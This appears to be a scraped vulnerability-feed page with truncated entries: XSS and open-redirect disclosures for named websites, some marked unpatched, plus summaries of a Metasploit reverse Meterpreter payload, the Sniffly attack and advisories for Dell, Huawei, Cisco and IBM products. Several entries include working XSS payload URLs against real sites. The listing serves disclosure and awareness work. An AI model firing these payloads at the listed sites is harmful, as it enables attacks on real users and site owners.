pelc.se XSS vulnerability

Vulnerable URL: http://pelc.se/requestXaX404/"';-- Details: Description| Value ---|--- Patched:| No Latest check for patch:| 26.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| Unknown / Not calculated Google Pagerank| 0 VIP website status:| No Check pelc.se...

visitdelaware.com XSS vulnerability

Vulnerable URL: http://www.visitdelaware.com/plugins/crm/track/?key=442=https://www.xssposed.org Details: Description| Value ---|--- Patched:| Yes, at 31.05.2016 Latest check for patch:| 31.05.2016 20:04 GMT Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 509783...

muse.dyu.edu.tw vulnerability

Vulnerable URL: http://muse.dyu.edu.tw:8080/1cate/linker?template=slinks:redirect=1473-6357id==openly=jsCate=https://www.xssposed.org Details: Description| Value ---|--- Patched:| Yes, at 21.12.2015 Latest check for patch:| 21.12.2015 16:07 GMT Vulnerability status:| Publicly disclosed Alexa Rank...

secure.hotair.co.uk XSS vulnerability

Vulnerable URL: https://secure.hotair.co.uk/inflightphotophoto.asp?ph=%22%3E%3Csvg/onload=prompt%28/XSSPOSED/%29%3E Details: Description| Value ---|--- Patched:| Yes, at 26.07.2017 Latest check for patch:| 26.07.2017 10:01 GMT Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Ale...

kyrkotorget.se XSS vulnerability

Vulnerable URL: http://kyrkotorget.se/index.php/"';--/?p=loggaIn.php Details: Description| Value ---|--- Patched:| No Latest check for patch:| 26.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| Unknown / Not calculated Google Pagerank| 0 VIP website status:|...

goletsgo.com Open Redirect vulnerability

Vulnerable URL: http://www.goletsgo.com/RedirectURL.asp?url=https://www.xssposed.org/ Details: Description| Value ---|--- Patched:| Yes, at 20.12.2015 Latest check for patch:| 20.12.2015 11:32 GMT Vulnerability type:| Open Redirect Vulnerability status:| Publicly disclosed Alexa Rank| Unknown / N...

readinglists.nottingham.ac.uk vulnerability

Vulnerable URL: http://readinglists.nottingham.ac.uk/link?url=https://www.xssposed.org/ Details: Description| Value ---|--- Patched:| Yes, at 21.12.2015 Latest check for patch:| 21.12.2015 18:50 GMT Vulnerability status:| Publicly disclosed Alexa Rank| 19213 Google Pagerank| 0 VIP website status:...

Millions of IoT Devices Using Same Hard-Coded CRYPTO Keys

Millions of embedded devices, including home routers, modems, IP cameras, VoIP phones, are shareing the same hard-coded SSH Secure Shell cryptographic keys or HTTPS HTTP Secure server certificates that expose them to various types of malicious attacks. A new analysis by IT security consultancy SE...

Windows Meterpreter Shell, Reverse HTTPS Inline

Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 178780 include Msf::Payload::TransportConf...

Sniffly - Sniffing Browser History Using HSTS + CSP.

Sniffly is an attack that abuses HTTP Strict Transport Security and Content Security Policy to allow arbitrary websites to sniff a user's browsing history. It has been tested in Firefox and Chrome. More info available in my ToorCon 2015 slides:...

leeward.hawaii.edu XSS vulnerability

Vulnerable URL: http://www.leeward.hawaii.edu/files/gallery/explorecampus/simpleviewer.swf?xmlDataPath=http://45.55.162.179/vuln.xml Details: Description| Value ---|--- Patched:| Yes, at 17.12.2015 Latest check for patch:| 17.12.2015 06:25 GMT Vulnerability type:| XSS Vulnerability status:|...

Dell Computers Contain CA Root Certificate Vulnerability

Dell personal computers using the preinstalled certificate authority CA root certificate eDellRoot contain a critical vulnerability. Exploitation of the vulnerability could allow a remote attacker to read encrypted web browser traffic HTTPS, impersonate spoof any website, or perform other attacks...

Huawei HG253s V2 Information Disclosure

Huawei HG253s v2 Vodafone-Spain is starting to rent a new Huawei HG253v2 router to the spanish costumers. This new router is coming with a new firmware version. This bug has been found by @VicenDominguez Vulnerability Basically, it is not validating the session cookie in some administration...

Dell eDellRoot / DSDTestProvider Root CA Certificates Installed

The remote Windows host is affected by a man-in-the-middle MitM vulnerability due to the installation of a non-authorized root CA certificate into the Windows trusted system certificate store. The private keys for many of these root CAs are publicly known. Furthermore, websites that use specially...

Cisco Mobility Service Engine Web Interface Detection

This script performs HTTPs based detection of Cisco Mobility Service Engine SPDX-FileCopyrightText: 2015 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only if description...

Cisco FireSIGHT Management Center Certificate Validation Vulnerability

A vulnerability in the rule update functionality of Cisco FireSIGHT Management Center MC could allow an unauthenticated, remote attacker to manipulate the content of the rule update packages and execute arbitrary code on the system. The vulnerability is due to lack of certificate validation durin...

littlemissdelicious.com XSS vulnerability

Vulnerable URL: http://www.littlemissdelicious.com/shop/search.php?q=%22%3E%3Csvg%2Fonload%3Dprompt%28%2FXSSPOSED%2F%29%3E=Search Details: Description| Value ---|--- Patched:| Yes, at 06.12.2015 Latest check for patch:| 06.12.2015 07:25 GMT Vulnerability type:| XSS Vulnerability status:| Publicly...

Session fixation

IBM DataPower Gateway appliances with firmware 6.x before 6.0.0.17, 6.0.1.x before 6.0.1.17, 7.x before 7.0.0.10, 7.1.0.x before 7.1.0.7, and 7.2.x before 7.2.0.1 do not set the secure flag for unspecified cookies in an https session, which makes it easier for remote attackers to capture these...

CVE-2015-7427

IBM DataPower Gateway appliances with firmware 6.x before 6.0.0.17, 6.0.1.x before 6.0.1.17, 7.x before 7.0.0.10, 7.1.0.x before 7.1.0.7, and 7.2.x before 7.2.0.1 do not set the secure flag for unspecified cookies in an https session, which makes it easier for remote attackers to capture these...

pantbanken.se XSS vulnerability

Vulnerable URL: https://www.pantbanken.se/auktioner/visa-auktionsvara/?fid="';-- Details: Description| Value ---|--- Patched:| No Latest check for patch:| 25.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 533931 Google Pagerank| 3 VIP website status:| No...